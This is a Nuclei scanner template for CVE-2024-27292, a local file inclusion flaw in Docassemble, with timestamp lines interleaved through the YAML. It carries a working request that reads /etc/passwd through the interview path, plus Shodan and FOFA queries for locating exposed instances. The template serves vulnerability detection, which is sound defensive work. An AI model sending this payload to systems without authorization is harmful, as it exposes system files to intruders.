2024-07-01 15:24:38 +00:00
id : CVE-2024-27292
info :
2024-07-02 10:06:30 +00:00
name : Docassemble - Local File Inclusion
2024-07-01 15:24:38 +00:00
author : johnk3r
severity : high
2024-07-02 10:06:30 +00:00
description : |
Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
2024-07-01 15:24:38 +00:00
reference :
- https://tantosec.com/blog/docassemble/
- https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
2024-07-02 10:06:30 +00:00
- https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2024-27292
cwe-id : CWE-706
epss-score : 0.00043
epss-percentile : 0.0866
2024-07-01 15:29:02 +00:00
metadata :
verified : true
2024-07-02 10:06:30 +00:00
max-request : 1
2024-07-01 15:29:02 +00:00
shodan-query : http.title:"docassemble"
2024-07-02 10:06:30 +00:00
fofa-query : icon_hash="-575790689"
tags : cve,cve2024,docassemble,lfi
2024-07-01 15:24:38 +00:00
2024-07-02 10:06:30 +00:00
http :
2024-07-01 15:24:38 +00:00
- method : GET
path :
- "{{BaseURL}}/interview?i=/etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0:"
- type : status
status :
- 501
2024-07-02 12:06:51 +00:00
# digest: 4b0a00483046022100d8b89e9955181d9c42c128bf1113ced63499aabac72a131110385c0d688d14cd022100c3821f365b88c32e60e587c998e270a901c7bf42808ab259453168ca771c16d8:922c64590222798bb761d5b6d8e72950